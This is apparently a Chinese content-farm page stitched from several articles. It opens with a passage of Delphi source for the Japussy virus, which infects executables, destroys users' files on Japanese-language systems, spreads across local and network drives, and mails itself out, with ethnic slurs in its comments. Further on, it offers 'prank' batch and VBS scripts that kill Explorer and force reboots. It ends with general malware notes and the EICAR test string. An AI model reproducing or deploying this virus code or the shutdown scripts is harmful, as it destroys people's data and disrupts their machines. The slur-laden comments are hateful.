if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染
Infected := True;
finally
SrcStream.Free;
end;
if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出
Exit;
IcoStream := TMemoryStream.Create;
DstStream := TMemoryStream.Create;
try
aIcon := TIcon.Create;
try
//得到被感染文件的主图标(744字节),存入流
aIcon.ReleaseHandle;
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
aIcon.SaveToStream(IcoStream);
finally
aIcon.Free;
end;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
//头文件
HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
//写入病毒体主图标之前的数据
CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
//写入目前程序的主图标
CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);
//写入病毒体主图标到病毒体尾部之间的数据
CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
//写入宿主程序
CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
//写入已感染的标记
DstStream.Seek(0, 2);
iID := $44444444;
DstStream.Write(iID, 4);
finally
HdrStream.Free;
end;
finally
SrcStream.Free;
IcoStream.Free;
DstStream.SaveToFile(FileName); //替换宿主文件
DstStream.Free;
end;
except;
end;
end;
{ 将目标文件写入垃圾码后删除 }
procedure SmashFile(FileName: string);
var
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begin
try
SetFileAttributes(PChar(FileName), 0); //去掉只读属性
FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件
try
Size := GetFileSize(FileHandle, nil); //文件大小
i := 0;
Randomize;
Max := Random(15); //写入垃圾码的随机次数
if Max < 5 then
Max := 5;
Mass := Size div Max; //每个间隔块的大小
Len := Length(Catchword);
while i < Max do
begin
FileSeek(FileHandle, i * Mass, 0); //定位
//写入垃圾码,将文件彻底破坏掉
FileWrite(FileHandle, Catchword, Len);
Inc(i);
end;
finally
FileClose(FileHandle); //关闭文件
end;
DeleteFile(PChar(FileName)); //删除之
except
end;
end;
{ 获得可写的驱动器列表 }
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 0 to 25 do //遍历26个字母
begin
D := Chr(i + 65);
Str := D + ':';
DiskType := GetDriveType(PChar(Str));
//得到本地磁盘和网络盘
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result := Result + D;
end;
end;
{ 遍历目录,感染和摧毁文件 }
procedure LoopFiles(Path, Mask: string);
var
i, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer;
begin
if (SearchRec.Attr '.') and
(SearchRec.Name <> '..') then
Result := 0 //不是目录
else if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and
(SearchRec.Name <> '..') then
Result := 1 //不是根目录
else Result := 2; //是根目录
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
begin
repeat
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑
if IsValidDir(SearchRec) = 0 then
begin
Fn := Path + SearchRec.Name;
Ext := UpperCase(ExtractFileExt(Fn));
if (Ext = '.EXE') or (Ext = '.SCR') then
begin
InfectOneFile(Fn); //感染可执行文件
end
else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
begin
//感染HTML和ASP文件,将Base64编码后的病毒写入
//感染浏览此网页的所有用户
//哪位大兄弟愿意完成之?
end
else if Ext = '.WAB' then //Outlook地址簿文件
begin
//获取Outlook邮件地址
end
else if Ext = '.ADC' then //Foxmail地址自动完成文件
begin
//获取Foxmail邮件地址
end
else if Ext = 'IND' then //Foxmail地址簿文件
begin
//获取Foxmail邮件地址
end
else
begin
if IsJap then //是倭文操作系统
begin
if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
SmashFile(Fn); //摧毁文件
end;
end;
end;
//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑
Sleep(200);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
SubDir := TStringList.Create;
if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
begin
repeat
if IsValidDir(SearchRec) = 1 then
SubDir.Add(SearchRec.Name);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
Count := SubDir.Count - 1;
for i := 0 to Count do
LoopFiles(Path + SubDir.Strings + '', Mask);
FreeAndNil(SubDir);
end;
{ 遍历磁盘上所有的文件 }
procedure InfectFiles;
var
DriverList: string;
i, Len: Integer;
begin
if GetACP = 932 then //日文操作系统
IsJap := True; //去死吧!
DriverList := GetDrives; //得到可写的磁盘列表
Len := Length(DriverList);
while True do //死循环
begin
for i := Len downto 1 do //遍历每个磁盘驱动器
LoopFiles(DriverList + ':', '*.*'); //感染之
SendMail; //发带毒邮件
Sleep(1000 * 60 * 5); //睡眠5分钟
end;
end;
{ 主程序开始 }
begin
if IsWin9x then //是Win9x
RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程
else //WinNT
begin
//远程线程映射到Explorer进程
//哪位兄台愿意完成之?
end;
//如果是原始病毒体自己
if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then
InfectFiles //感染和发邮件
else //已寄生于宿主程序上了,开始工作
begin
TmpFile := ParamStr(0); //创建临时文件
Delete(TmpFile, Length(TmpFile) - 4, 4);
TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格
ExtractFile(TmpFile); //分离之
FillStartupInfo(Si, SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); //创建新进程运行之
InfectFiles; //感染和发邮件
end;
看了“计算机病毒源代码什么样”文章的还看了:
浏览量:2
下载量:0
时间:
有时候想和朋友们玩玩,搞点恶搞电脑病毒给他们,要怎么办呢?下面由读文网小编给你做出详细的恶搞电脑病毒代码介绍!希望对你有帮助!
新建一个文本文档(.txt),要复制以下代码:
@echo off
color 4
tskill explorer
echo .
echo .
echo .
echo .
echo 警告:在病毒执行期间禁止关闭电源,
echo 否则你就和你心爱的电脑说
echo .
echo . BYE-BYE
echo .
echo Computer system crash!
echo .
echo .
echo I am a virus, my name is Ghost.
echo 我是魔鬼病毒,在这个堕落的世界上苏醒了。
echo .
echo . Warning! CPU has been changed please re-enter CPU settings
echo. in the CMOS setuo and remember to save before quit.
echo. Secondary IDE channel no 80 conductor cable installed.
set /p select=:)
if "%select%"=="" goto start
:start
shutdown -r -t 10 -c "您的计算机上带有魔鬼病毒,今天是它的发作日期。病毒已经破坏了您的系统,您的计算机将在10秒钟后重启。"
::结束
再另存为:名字.bat 你要记住"名字"后面要加".bat"
就可以了,没有任何破坏性,吓吓人。
你可以试试看看效果。
看了“恶搞电脑病毒代码有哪些”文章的还看了:
浏览量:2
下载量:0
时间:
恶搞代码和电脑病毒是有很大区别的!那么它们的区别是什么呢?下面由读文网小编给你做出详细的恶搞代码和病毒区别介绍!希望对你有帮助!
恶意插件,指的是安装在被安装者电脑中的恶意软件,能够强迫被安装的电脑执行制定的操作,导致个人财产损失。病毒则需要具有固定的发作动作、发作条件等,并且相对于恶意插件来说破坏得更加严重。
木马则需要使用指定的载体进入到被感染的计算机,并且会释放载体之外的文件,一般还具有自我销毁功能。
因此,计算机如果感染了病毒,可以通过升级杀毒软件进行杀毒解决问题;如果感染了木马,也可以通过专杀工具进行查杀;如果感染了恶意插件,则建议直接重新安装系统,此类插件较难清除。
浏览量:3
下载量:0
时间:
计算机病毒也是要生成的,那么计算机病毒代码有些什么呢?下面由读文网小编给你做出详细的计算机病毒代码介绍!希望对你有帮助!
给你个恶搞的玩on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,true
dim a
do while(a <> "我是猪")
a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"
浏览量:4
下载量:0
时间:
你知道一直伤害我们的计算机病毒是用什么编写的吗?小编来告诉你!下面由读文网小编给你做出详细的计算机病毒编写语言介绍!希望对你有帮助!
可以说任何一种语言都可以写病毒,我们常见的网页病毒是多是vbs实现的,木马多是delphi,系统病毒可以用c,c++
最牛的会用汇编甚至二进制码~手机的一般用java,就连com很批处理都可以写出很阴损的病毒,大家熟识的autorun甚至是记事本写的
浏览量:2
下载量:0
时间:
计算机源病毒代码是怎么样的呢?跟着小编去看看吧!下面由读文网小编给你做出详细的计算机病毒源代码介绍!希望对你有帮助!
病毒测试代码:
欧洲计算机防病毒协会提供的测试病毒代码。本代码尽管测试,无任何危险。
请复制下面的代码到文本中保存
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
请复制上面的代码到文本中保存
测试方法:
1.鼠标右键点击桌面空白处,创建一个“文本文档”。
2.将上面这段测试代码复制到“文本”里,保存,然后可以直接右键点击这个文本,用杀毒软件扫描也可以等一会,如果你的杀毒软件还行,会自动报毒并将该文本删除那就可以初步放心了。
测试原理:
该段代码是欧洲计算机防病毒协会开发的一种病毒代码,其中的特征码已经包含在各种杀毒软件的病毒代码库里,所以可以用做测试病毒扫描引擎。
测试等级:
特等:复制完代码后便提示内存有病毒
优等:刚保存完就提示病毒(或者直接删除)
中等:保存后几秒提示病毒(或者直接删除)
下等:需自己启动病毒扫描查杀才提示病毒(或者直接删除)
看了“计算机病毒源代码怎么样 ”文章的还看了:
浏览量:2
下载量:0
时间: